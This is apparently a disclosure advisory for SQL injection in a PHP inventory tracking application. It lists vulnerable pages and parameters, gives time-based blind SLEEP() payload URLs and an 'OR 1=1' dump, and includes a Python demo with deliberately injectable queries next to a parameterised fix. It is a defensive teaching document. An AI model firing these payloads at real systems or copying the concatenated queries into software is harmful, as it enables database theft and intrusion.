0x01 Description
0x02 SQL Injection
0x03 Vendor Notification
PHP + SQL Inventory tracking system
The Inventory application has multiple pages and parameters that are
vulnerable to SQL injection. These vulnerabilities could be used to
extract information from the database or to take remote control of the
server. The PoC payloads below are time-based blind injections: a response
delayed by roughly five seconds confirms that the injected SLEEP(5) was
executed by the database.
-----Vulnerable Pages-----
http://localhost/inventory/consulta_fact.php?fact_num=[SQLi]
http://localhost/inventory/addinventario.php?ref=[SQLi]&sn=[SQLi]&factura=[SQLi]
http://localhost/inventory/newtransact.php?ref=[SQLi]
-----PoC Exploits-----
http://localhost/inventory/consulta_fact.php?fact_num=17 AND SLEEP(5)
http://localhost/inventory/[email protected]' AND SLEEP(5) AND 'EJxe'='EJxe&sn=555-555-[email protected]' AND SLEEP(5) AND 'IgkP'='IgkP&[email protected]' AND SLEEP(5) AND 'CFdY'='CFdY
http://localhost/inventory/newtransact.php?ref=RSC-280' AND SLEEP(5) AND 'wIUB'='wIUB
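The vulnerable pattern and the time-based oracle behind the PoCs above, as an added example that is not part of the original advisory or of the Inventory application's code. The application's PHP source is not on the page, so the table names (factura, inventario), their columns, and the string-concatenated queries are assumed reconstructions of the pattern; SQLite stands in for MySQL, with a registered SLEEP() function so the advisory's payload shapes run unchanged, and the delay is shortened from 5 s to 0.2 s so the run stays quick.

```python
import sqlite3
import time

# Constructed stand-in for the application's database (table and column
# names are assumptions; the advisory only names the pages and parameters).
SCHEMA = """
CREATE TABLE factura (fact_num INTEGER PRIMARY KEY, cliente TEXT);
CREATE TABLE inventario (ref TEXT, sn TEXT, factura TEXT);
"""
FACTURAS = [(17, "ACME"), (18, "Globex")]
INVENTARIO = [("RSC-280", "SN-001", "17")]


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO factura VALUES (?, ?)", FACTURAS)
    conn.executemany("INSERT INTO inventario VALUES (?, ?, ?)", INVENTARIO)
    # SQLite has no SLEEP(); register one with MySQL's behaviour (block for
    # n seconds, return 0) so the advisory's payloads run unchanged.
    conn.create_function("SLEEP", 1, lambda n: time.sleep(float(n)) or 0)
    return conn


def consulta_fact_vulnerable(conn, fact_num):
    # Assumed reconstruction of consulta_fact.php: the GET parameter is pasted
    # into a numeric comparison, so no quote is needed to inject.
    sql = "SELECT fact_num, cliente FROM factura WHERE fact_num = " + fact_num
    return conn.execute(sql).fetchall()


def newtransact_vulnerable(conn, ref):
    # Assumed reconstruction of newtransact.php: the value sits inside single
    # quotes, hence the payload closes the quote and re-balances it with
    # AND 'wIUB'='wIUB so the statement still parses.
    sql = "SELECT ref, sn, factura FROM inventario WHERE ref = '" + ref + "'"
    return conn.execute(sql).fetchall()


def newtransact_fixed(conn, ref):
    # Fix: a bound parameter is sent separately from the SQL text, so the
    # value can never alter the statement's structure.
    sql = "SELECT ref, sn, factura FROM inventario WHERE ref = ?"
    return conn.execute(sql, (ref,)).fetchall()


def time_based_check(query, conn, benign, payload, delay):
    """Time-based blind oracle as used in the PoCs: issue the benign value,
    then the SLEEP payload, and report whether the payload added ~delay s."""
    start = time.perf_counter()
    query(conn, benign)
    baseline = time.perf_counter() - start
    start = time.perf_counter()
    query(conn, payload)
    elapsed = time.perf_counter() - start
    return (elapsed - baseline) >= 0.9 * delay


DELAY = 0.2  # the advisory uses SLEEP(5); shortened here to keep the run quick
NUMERIC_PAYLOAD = f"17 AND SLEEP({DELAY})"
STRING_PAYLOAD = f"RSC-280' AND SLEEP({DELAY}) AND 'wIUB'='wIUB"


def main():
    conn = connect()
    print("vulnerable numeric param, SLEEP confirmed:",
          time_based_check(consulta_fact_vulnerable, conn, "17", NUMERIC_PAYLOAD, DELAY))
    print("vulnerable string param, SLEEP confirmed:",
          time_based_check(newtransact_vulnerable, conn, "RSC-280", STRING_PAYLOAD, DELAY))
    # Same parameter after the fix: the payload is just a ref that matches nothing.
    print("fixed string param, SLEEP confirmed:",
          time_based_check(newtransact_fixed, conn, "RSC-280", STRING_PAYLOAD, DELAY))
    # Beyond the delay oracle: a boolean payload dumps every invoice at once.
    print("all invoices via 17 OR 1=1:", consulta_fact_vulnerable(conn, "17 OR 1=1"))


if __name__ == "__main__":
    main()
```

The check compares the payload's response time against a benign baseline rather than against a fixed threshold, which is how a practitioner separates a genuine SLEEP() from an ordinarily slow page; the parameterised newtransact_fixed() shows that the same payload, once bound as a value, neither delays the response nor returns a row.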
10/19/12 - Vendor Notified
10/26/12 - No response, disclosure